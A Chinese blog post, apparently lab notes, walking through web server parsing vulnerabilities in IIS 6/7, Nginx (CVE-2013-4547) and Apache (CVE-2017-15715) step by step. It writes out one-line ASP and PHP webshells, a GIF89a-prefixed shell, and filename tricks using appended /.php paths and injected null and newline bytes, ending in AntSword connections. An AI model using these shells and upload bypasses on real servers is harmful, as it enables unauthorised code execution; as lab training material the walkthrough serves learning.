当前位置: 首页 > news >正文

中间件解析漏洞

一:IIS

less-1 IIS6.X

步骤一:在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件

步骤二:在x.asp中新建⼀个.txt⽂件,内容为<%=now()%> asp代码,更改后缀为jpg

步骤三:在外部浏览器进行访问Window2003的ip/x.asp/1.jpg,得出时间

步骤四:创建2.txt 输入asp一句话木马<%eval request("pass")%> 更改文件名后缀为.jpg

步骤五:进行访问

步骤六:进行蚁剑连接

less-2 IIS7.X

步骤一:配置 php.ini ⽂件,将 cgi.fix_pathinfo=1 取消掉...并重启....

步骤二:IIS --》 配置⽹站--》 处理程序映射--》 PHPStudy_FastCGI --》 请求限制 --》取消勾

步骤三:根目录下添加1.jpg

内容:<?php @eval($_POST[cmd]);?>

步骤四:访问1.jpg/.php

步骤五:进行蚁剑连接

二:Nginx

less-3 nginx_parsing_vulnerability

步骤一:开启靶场环境

步骤二:访问靶机地址

步骤三:创建lsz.jpg

步骤四:进行提交

进行访问/uploadfiles/c7ca40e5b7a0bb68db13aa890567898b.jpg

后添加/.php

步骤五:进行蚁剑连接

less-4 CVE-2013-4547

步骤一:开启靶场环境

步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀

步骤三:在hex中将jpg后面第二个空格20改为00,放行

步骤四:访问上传后的文件,抓包

/uploadfiles/shell.jpg  .php

三.Apache

less-5 apache_parsing

步骤一:开启靶场环境

步骤二:访问靶机并上传 lsz.php.jpg 文件,

进行访问:/uploadfiles/lsz.php.jpg

进行访问:/uploadfiles/lsz.php

步骤三:进行蚁剑连接

less-6 CVE-2017-15715

步骤一:开启靶场环境

步骤二:访问靶场环境

步骤三:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a
<?php @eval($_POST['cmd']);?>,filename为1.php

步骤三:抓包,1.php后面加空格,hex中空格20改为0a

步骤四:放行访问1.php%0A

步骤五:进行蚁剑连接

http://www.lryc.cn/news/431212.html

相关文章:

  • 如何在Mac电脑上本地部署Stable Diffusion:详细教程(webUI)
  • FPGA随记——移位寄存器
  • Java | Leetcode Java题解之第390题消除游戏
  • 新型PyPI攻击技术可能导致超2.2万软件包被劫持
  • spring cloud gateway 之删除请求头
  • Flutter自动打包ios ipa并且上传
  • 深入理解synchronized的原理是什么
  • Electron32-Vue3OS桌面管理os模板|vite5+electron32+arco后台os系统
  • c++ 定义函数
  • 【深度学习 计算机视觉】计算机视觉工程师所需的和有帮助的基本技能
  • 【CSS】如何写渐变色文字并且有打光效果
  • Android 14(API 级别 34)中,DexClassLoader 不再支持可写 dex/jar 文件
  • Linux -动静态库
  • 原点安全荣获“AutoSec Awards 安全之星”优秀汽车数据安全合规方案奖
  • 2024前端面试题分享
  • 数学基础 -- 线性代数之正交矩阵
  • PostgreSQL 17即将发布,新功能Top 3
  • 心觉:别再做单线程的打工人!换个思路突破
  • 深度学习-用神经网络NN实现足球大小球数据分析软件
  • linux 9系统分区扩容
  • Solidity初体验
  • 大模型笔记01--基于ollama和open-webui快速部署chatgpt
  • html前段小知识点
  • AD7606工作原理以及FPGA控制验证(串行和并行模式)
  • 如何查看Pod的Container资源占用情况
  • WordPress上可以内容替换的插件
  • C++ | Leetcode C++题解之第355题设计推特
  • 构建并训练卷积神经网络(CNN)对CIFAR-10数据集进行分类
  • flowable 根据xml 字符串生成流程图
  • AI建模——AI生成3D内容算法产品介绍与模型免费下载